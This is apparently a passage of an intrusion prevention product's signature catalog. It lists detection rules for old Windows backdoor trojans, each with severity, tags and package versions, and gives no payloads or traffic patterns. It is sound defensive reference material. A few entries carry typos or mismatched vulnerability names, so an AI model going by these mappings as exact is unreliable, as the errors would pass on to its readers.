Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Blazer5
Description:
Back to top

BD-TCP_Blazer5-Response-In-Default-Port

About this situation: Blazer5 backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Blazer5, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-348-4219
Vulnerability: Backdoor-Blazer5
Description:
Back to top

BD-TCP_Blood-Fest-Evolution-Respose

About this situation: Blood Fest Evolution backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Blood Fest Evolution, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Blood-Fest-Evolution
Description:
Back to top

BD-TCP_Breach-Response

About this situation: Breach backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows 95, Windows 98, Windows NT, Any Hardware, Breach, Windows NT not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Breach
Description:
Back to top

BD-TCP_Bugs-Response

About this situation: Bugs backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows 95, Windows 98, Windows NT, Any Hardware, Bugs, Windows NT not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-720-5211
Vulnerability: Backdoor-Bugs
Description:
Back to top

BD-TCP_Bugs-Response-In-Default-Port

About this situation: Bugs backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows 95, Windows 98, Windows NT, Any Hardware, Bugs, Windows NT not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: Backdoor-Bugs
Description:
Back to top

BD-TCP_Buschtrommel

About this situation: Buschtrommel backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-Buschtrommel
Description:
Back to top

BD-TCP_ButtMan-Request

About this situation: ButtMan backdoor client request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, ButtMan, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-ButtMan
Description:
Back to top

BD-TCP_CAFEiNi-Response

About this situation: CAFEiNi backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CAFEiNi, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-CAFEiNi
Description:
Back to top

BD-TCP_Celine-Response

About this situation: Celine backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Celine, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Celine
Description:
Back to top

BD-TCP_Cero-Response

About this situation: Cero backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Cero, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Cero
Description:
Back to top

BD-TCP_Chupacabra

About this situation: Chupacabra backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-BackOrifice2000
Description:
Back to top

BD-TCP_Connection-Response

About this situation: Connection backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Connection, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Connection
Description:
Back to top

BD-TCP_Cow-Trojan-Request

About this situation: Cow Trojan backdoor request
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Backdoor-Trojan-Cow
Description:
Back to top

BD-TCP_Crack-Down-Response

About this situation: Crack Down backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Cray Down, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Crack-Down
Description:
Back to top

BD-TCP_CrazzyNet-Response

About this situation: CrazzyNet backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CrazzyNet, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-CrazzyNet
Description:
Back to top

BD-TCP_Danton-Response

About this situation: Danton backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Danton, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Danton
Description:
Back to top

BD-TCP_Dark-Connection-Inside-Response

About this situation: Dark Connection Inside backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Dark Connection Inside, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Dark-Connection-Inside
Description:
Back to top

BD-TCP_DFch-Grisch

About this situation: DFch Grisch backdoor access
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-DFch-Grisch
Description:
Back to top

BD-TCP_Digital-Rootbeer

About this situation: Digital Rootbeer backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-Digital-Rootbeer
Description:
Back to top

BD-TCP_Dolly-Request

About this situation: Dolly backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Doly, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Backdoor-Doly
Description:
Back to top

BD-TCP_Doly-1-7-Request

About this situation: Dolly backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Doly, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Doly
Description:
Back to top

BD-TCP_Doly-Response

About this situation: Doly backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Doly, CVE1999, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Doly
Description:
Back to top

BD-TCP_Donald-Dick-Response

About this situation: Donald Dick backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows 95, Windows 98, Windows NT, Any Hardware, Donald Dick, Windows NT not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-448-4219
Vulnerability: Backdoor-Donald-Dick
Description:
Back to top

BD-TCP_Drat-Response

About this situation: Drat backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Drat, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Drat
Description:
Back to top

BD-TCP_DTr-Response

About this situation: DTr backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, DTr, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-DTr
Description:
Back to top

BD-TCP_Duddie

About this situation: Duddie backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Duddie
Description:
Back to top

BD-TCP_Duddie-2.0

About this situation: Duddie backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Duddie
Description:
Back to top

BD-TCP_Duddie-3.1

About this situation: Duddie backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Duddie
Description:
Back to top

BD-TCP_Duddie-3.2

About this situation: Duddie backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Duddie
Description:
Back to top

BD-TCP_EventHorizon

About this situation: EventHorizon backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Duddie
Description:
Back to top

BD-TCP_Exploiter-Response

About this situation: Exploiter backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows 95, Windows 98, Windows ME, Any Hardware, Exploiter, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Exploiter
Description:
Back to top

BD-TCP_F-Backdoor-Response

About this situation: F-Backdoor backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, F-Backdoor, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-F-Backdoor
Description:
Back to top

BD-TCP_Forced-Entry-Response

About this situation: Forced Entry backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Forced Entry, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Forced-Entry
Description:
Back to top

BD-TCP_Fore-Response

About this situation: Fore backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows 95, Windows 98, Any Hardware, Fore, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Fore
Description:
Back to top

BD-TCP_Frenzy-2000

About this situation: Frenzy 2000 backdoor access
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Frenzy-2000
Description:
Back to top

BD-TCP_Frenzy-Response

About this situation: Frenzy backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows 95, Windows 98, Any Hardware, Frenzy, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Frenzy
Description:
Back to top

BD-TCP_GateCrasher-Response

About this situation: GateCrasher backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, GateCrasher, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-GateCrasher
Description:
Back to top

BD-TCP_Ghost-Response

About this situation: Ghost backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Ghost, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Ghost
Description:
Back to top

BD-TCP_Gift-Latinus-Pest-Response

About this situation: Gift/Latinus/Pest backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Gift-Latinus-Pest, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Gift-Latinus-Pest
Description:
Back to top

BD-TCP_GirlFriend-Response

About this situation: GirlFriend backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, GirlFriend, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-155-2032
Vulnerability: Backdoor-GirlFriend
Description:
Back to top

BD-TCP_Glacier

About this situation: Glacier backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Glacier
Description:
Back to top

BD-TCP_Gspot-Response

About this situation: Gspot backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Gspot, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Gspot
Description:
Back to top

BD-TCP_Hack-A-Tack

About this situation: Hack-a-tack backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Hack-A-Tack
Description:
Back to top

BD-TCP_Hackers-World

About this situation: Hackers World backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Hack-A-Tack
Description:
Back to top

BD-TCP_Hellz-Addiction-Response

About this situation: Hellz Addiction backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Hellz Addiction, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Hellz-Addiction
Description:
Back to top

BD-TCP_Host-Control-Response

About this situation: Host Control backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows 95, Windows 98, Any Hardware, Host Control, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Host-Control
Description:
Back to top

BD-TCP_InCommand-Response

About this situation: InCommand backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, InCommand, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-InCommand
Description:
Back to top

BD-TCP_Infector-Response

About this situation: Infector backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Infector, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Infector
Description:
Back to top

BD-TCP_Insane-Network-Response

About this situation: Insane Network backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Insane Network, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Insane-Network
Description:
Back to top

BD-TCP_Intruzzo

About this situation: Intruzzo backdoor access
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-254-3038
Vulnerability: Backdoor-Intruzzo
Description:
Back to top

BD-TCP_Kid-Terror-Response

About this situation: Kid Terror backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Kid Terror, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Kid-Terror
Description:
Back to top

BD-TCP_Konik

About this situation: Konik backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Backdoor-Glacier
Description:
Back to top

BD-TCP_Kuang2-Virus-Response

About this situation: Kuang2 Virus backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows 95, Windows 98, Any Hardware, Kuang2, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Kuang2-Virus
Description:
Back to top

BD-TCP_Last2000

About this situation: Last2000 backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-255-3038
Vulnerability: Backdoor-Last2000
Description:
Back to top

BD-TCP_Leszcz-Response

About this situation: Leszcz backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Leszcz, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Leszcz
Description:
Back to top

BD-TCP_Lithium

About this situation: Lithium backdoor access
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-255-3038
Vulnerability: Backdoor-Lithium
Description:
Back to top

BD-TCP_M2-Trojan-Response

About this situation: M2 Trojan backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, M2 Trojan, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-M2-Trojan
Description:
Back to top

BD-TCP_Mantis-Response

About this situation: Mantis backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Mantis, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Mantis
Description:
Back to top

BD-TCP_Massaker-Response

About this situation: Massaker backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Massaker, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Massaker
Description:
Back to top

BD-TCP_Masters-Of-Paradise

About this situation: Masters Of Paradise backdoor access
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1072-5242
Vulnerability: Backdoor-Masters-Of-Paradise
Description:
Back to top

BD-TCP_Mavericks-Matrix-Response

About this situation: Maverick's Matrix backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows 95, Windows 98, Any Hardware, Mavericks Matrix, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Mavericks-Matrix
Description:
Back to top

BD-TCP_Meet-The-Lamer

About this situation: Meet The Lamer backdoor access
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-255-3038
Vulnerability: Backdoor-Meet-The-Lamer
Description:
Back to top

BD-TCP_Michal-Response

About this situation: Michal backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Michal, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Michal
Description:
Back to top

BD-TCP_Microspy

About this situation: Microspy backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-255-3038
Vulnerability: Backdoor-Microspy
Description:
Back to top

BD-TCP_Millenium-Response

About this situation: Millenium backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Millenium, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Millenium
Description:
Back to top

BD-TCP_Mini-Oblivion-Response

About this situation: Mini Oblivion backdoor response
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Mini Oblivion, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Mini-Oblivion
Description:
Back to top

BD-TCP_Mneah-Response

About this situation: Mneah backdoor response detected
Context: TCP Server Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, Mneah, Windows not specific, Successful Attacks, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Backdoor-Mneah
Description:
Back to top

BD-TCP_Moonpie-Response

About this situation: Moonpie backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Moonpie, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Moonpie
Description:
Back to top

BD-TCP_Mosucker-Response

About this situation: Mosucker backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows 95, Windows 98, Any Hardware, Mosucker, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Mosucker
Description:
Back to top

BD-TCP_Mydoom.a-Backdoor

About this situation: MyDoom.A backdoor
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, MyDoomA, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-164-2032
Vulnerability: Mydooma-Backdoor
Description:
Back to top

BD-TCP_Net-Administrator

About this situation: Net Administrator backdoor access
Context: TCP Client Stream Unknown
Severity: 10
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-255-3038
Vulnerability: Backdoor-Net-Administrator
Description:
Back to top

BD-TCP_Net-Devil-Response

About this situation: Net-Devil backdoor response
Context: TCP Server Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Net-Devil, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-325-4219
Vulnerability: Backdoor-Net-Devil
Description:
Back to top

BD-TCP_Net-Metropolitan

About this situation: Net Metropolitan backdoor access
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-255-3038
Vulnerability: Backdoor-Net-Metropolitan
Description:
Back to top

BD-TCP_Net-Metropolitan-Reply

About this situation: Net Metropolitan backdoor reply
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, CVE1999, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-256-3038
Last changed: sgpkg-ips-257-3038
Vulnerability: Backdoor-Net-Metropolitan
Description:
Back to top

